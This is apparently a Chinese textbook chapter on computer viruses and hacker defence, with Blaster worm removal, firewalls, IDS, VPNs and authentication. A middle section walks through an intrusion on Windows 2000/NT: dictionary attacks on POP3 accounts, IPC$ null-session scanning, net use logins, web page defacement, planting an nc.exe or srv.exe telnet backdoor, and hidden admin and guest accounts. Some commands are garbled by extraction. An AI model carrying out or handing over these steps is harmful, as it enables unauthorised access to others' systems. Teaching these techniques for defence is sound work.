计算机维护技术第9章、计算机病毒与黑客防范9.1计算机病毒解析1、计算机病毒的来源:一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方即安全漏洞,所以出现了计算机病毒。2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种计算机程序。这类程序的主要特征如下:程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。3、计算机病毒的分类:引导性病毒、文件性病毒、网络型病毒9.2计算机病毒4、病毒程序模型:包括三个部分,即安装模块、感染模块和破坏模块。5、计算机病毒的规律和现象。①内存少了1KB。一般病毒程序在内存中占用高端1K的空间。该空间DOS操作系统管不了,病毒修改内存空间大小标记单位[0413]单元中的内容,造成DOS操作系统就认为机器是少1KB内存空间大小。②引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区软盘只有DOS引导扇区。③文件被加长,文件性病毒寄生在可执行文件上,如COM或EXE文件。④启动程序被修改。9.3计算机病毒的防范1、使用OFFICESCAN软件杀毒2、使用江民杀毒王杀毒3、使用瑞星杀毒软件清除病毒。4、清除冲击波病毒实例。冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒当时几乎造成60%的计算机处于瘫痪。该病毒的特点如下:①病毒名称:Worm.Blaser发作时间:随机②病毒类型:蠕虫病毒传播途径:网络/RPC漏洞③依赖系统:Windows2000/XP病毒尺寸:6176字节④发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有9.4、清除冲击波病毒实例漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反复得启动、不能收发邮件、不能正常复制和粘贴文件,无法正常浏览网页,DNS和IIS服务遭到非法拒绝等。冲击波病毒的清除1、DOS环境下清除用DOS系统盘启动,再进入Windows目录下查找msblast.exe删除。2、安全模式下清除f启动Windows进入安全模式,搜索C盘,查找msblast.exe文件,删除。9.5、清除冲击波病毒实例3、给系统打补丁,进入微软网站下载系统补丁Windows2000下载地址:=c8b8a846-f541-4c15-8c9f-22354449117&displaylang=en4、使用瑞星杀毒软件,须升级到15.48.019.6、黑客入侵解析黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人计算机系统的人。黑客入侵术:1、密码破解术:通过网络监听用户密码、利用专门软件破解、获得服务上的shadow密码文件再破解。2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷(netthief)、WAY2.4(火凤凰\无赖小子)\广外女生\聪明基因,netspy(网络精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。从而泄漏信息。3、监听术:拦截网络接口获取密码如sniffer软件。9.7、黑客入侵解析4、电子邮件技术:佯称自己是系统管理员,给用户发送邮件要求用户更改密码或在正常的附件中加载木马程序。5、系统漏洞术:利用操作系统和应用程序的漏洞。6、默认帐户术:如unix主机都有FTP和GUEST帐户。9.8、网络入侵实例解析1、从因特网上下载流光(Fluxay)V4.71FORWinNT/2000/XP。操作演示:如何探测电子邮件:电子邮件系统一般建立在网络服务器上,如电子邮件地址xxx@hotmail.com表示该电子邮件存储在网站上,其域名为Pop.hotmail.com探测pop.hotmail.com①打开软件-----选pop3主机,右击在弹出式菜单中选择“编辑”,然后“添加”----pop.hotmail.com②使用字典:在主画面中选择pop3主机----右击---编辑---从列表中添加---一个字典文件。③探测-----选择pop3主机,右击----探测用户信息9.9、网络入侵实例解析利用IPC进行探测:IPC$是共享“命名管道”的资源,它对于程序间的通信很重要,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$可以与目标主机建立一个空的连接(无需用户名和密码),而利用这个空连接就可以得到目标主机上的用户列表,并配合字典进行密码尝试。例探测207.188.221.1---207.188.222.255①确定探测地址:选探测-----选择扫描pop3/ftp/nt/sql主机在主机扫描范围输入207.188.221.1---207.188.222.255类型选择“NT/98”②选择IPC$主机----右击-----检测主机类型看结果。扫描到开放的主机后,在Windows2k的cmd.exe下键入Netuse\\IP地址\IPC$“密码“/user:“用户名”9.10、网络入侵实例解析连接成功后,可以更换对方Web主页,键入如下:Copyc:\index.htm\\IP地址\C$\inetpub\是对方主机主页目录。留后门,如果想在以后登录该服务器,可以设置telnet服务,操作步骤如下:上传srv.exe程序,将流光目录tool文件下的srv.exe复制到C盘,将srv.exe复制到对方服务器system32目录Copyc:\srv.exe\\IP地址\admin$9.11网络入侵实例解析获取进程,键入如下命令:Nettime\\IP地址得到时间,记住这个时间,在稍后的时间启动srv.exe,键入At\\ip地址启动telnet的时间srv.exe这时用srv.exe打开的默认端口是99,完成种木马。再次登录,键入如下命令telnetIP地址99就可再访问该服务器,直接到对方服务器的c:\winnt\system32\目录下,这是黑客入侵的全过程9.12、网络入侵的常用命令Net命令1、假设对方的IP地址是127.0.0.1,获取的用户名是abc,密码是123456,利用IPC$连接、登录、退出。IPC$是一种共享空连接。连接并登录Netuse\\127.0.0.1\ipc$“123456”/user:“abc”退出Netuse\\127.0.0.1\ipc$/delte利用SA用户增加用户,用户名bcd,密码123456一般SA用户相当系统的超级用户。创建用户:Netusebcd123456/add加入administrator组:Netlocalgroupadministratorbcd/add设置guset默认用户。9.13网络入侵的常用命令Guest是NT默认用户,无法删除。可激活它并加上密码激活guest用户:Netuserguest/active:yes增加密码:Netuserguest123456一旦这样做后,就可以使用guest用户自由登录,并且不被发现。AT命令:此命令的功能是在特定的日期和时间运行某些命令和程序.种木马假设已经登录了对方主机,键入如下命令:Nettime\\127.0.0.1这时系统返回一个时间,如12:1,同时得到新的作业ID=1,9.14网络入侵的常用命令启动一个程序,键入at\\127.0.0.112:3nc.exe在12:3时间执行nc.exe程序,执行该程序,对方99端口就开放,这就在对方机器上种下一个木马.telnet:远程登录命令,在正常情况下需要用户名和密码,如果利用种下的木马,可以真接打开端口。如telnet127.0.0.199FTP:是文件传输命令例设FTP服务器为,密码为123,用FTP命令实现文件双向传输。登录:ftp文件传送到对方d:\下Putc:\index.htmd:\将对方d:\index.htm文件传送到本机c:\下Getd:\index.htmc:\9.15网络入侵的常用命令Netstar:显示网络连接、路由表和网络接口信息,可以让用户得知目前有哪些网络连接正在运作。在本机上使用netstar命令。$netstar9.16黑客防范技术1、基本防范方法将磁盘分区转换为NTFS格式。远程访问(RAS)防范访问单一服务器:限定所有远程用户访问单一服务器使用其他协议:RAS服务器一般都使用TCP/IP协议,而TCP/IP协议比较容易受攻击,改为IPX/SPX和netbeui.用户地址绑定,将用户名、密码、网卡和计算机名绑定。及时更新安全漏洞补救程序。2、防火墙技术防火墙是一种用来加强网络之间访问控制的特殊网络互联设备。放在内网和外网之间,根本任务是阻止外网用户非法入侵,但不能阻止外网和内网之间的正常通信。9.17黑客防范技术1、通常使用的安全控制手段有①包过滤、②状态检测③代理服务。代理服务是运行于内部网络和外部网络之间的主机之上的一种应用。当用户需要访问代理服务器另一侧的主机时,对符合安全规则的连接,代理服务器会代替主机响应,并重新各主机发出一个相同的请求,当此连接请求得到回应度建立起连接之后,内部主机同外部主机之间的通信将通过代理程序映射相应边接实现。9.18黑客防范技术2、防火墙产品:分为硬件防火墙和软件防火墙华堂防火墙:一种智能过滤型软硬件一体化防御系统网络卫士防火墙瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、4444端口和UDP的99端口进行攻击。9.19黑客防范技术3、瑞星防火墙设置举例:下载瑞星防火墙软件演示:4、网络入侵检测:是对防火墙的合理补充,帮助系统对网络攻击,扩展了系统管理员的安全管理能力,从网络中若干关键点收集信息,看网络中是否有违安全策略的行为和遭到袭击的迹象。是典型的防黑客攻击技术,代表产品有华依网络入侵检测系统。9.20VPN虚拟专用网1、VPN虚拟专用网组建2、VPN示意图9.21网络安全体系结构网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系统级安全和管理安全。解决网络安全常用手段:①防病毒软件②防火墙③入侵检测④虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚拟局域网.。⑤虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专有通道在公共网络上创建一个安全的专的连接。⑥加密技术:加密网络不依赖于网络传输途径,是通过对数据本身的加密来保障网络安全性9.22网络安全体系结构认证技术:解决网络通信过程中通信双方的身份认可。常用认证方法①User/Password认证:常用于操作系统登录\telnet,此认证方式不加密,容易被监听和解密。②使用摘要算法认证:Radius(拔号认证协议)\OSPf(路由协议)SNMPSecurityprotocol等均使用共享的SecurityKey,加上摘要算法.③基于PKI认证:使用公开密钥体系进行认证和加密,安全性很高。应用在电子邮件、应用服务器访问、客户认证、防火墙认证,涉及到繁重的证书管理任务。④数字签名:可验证发送者身份和消息完整性。消息随数字签名一同发送,对消息的任何修改要验证数字签名时都被发现,伪造数字签名从计算机能力上讲是不可行的。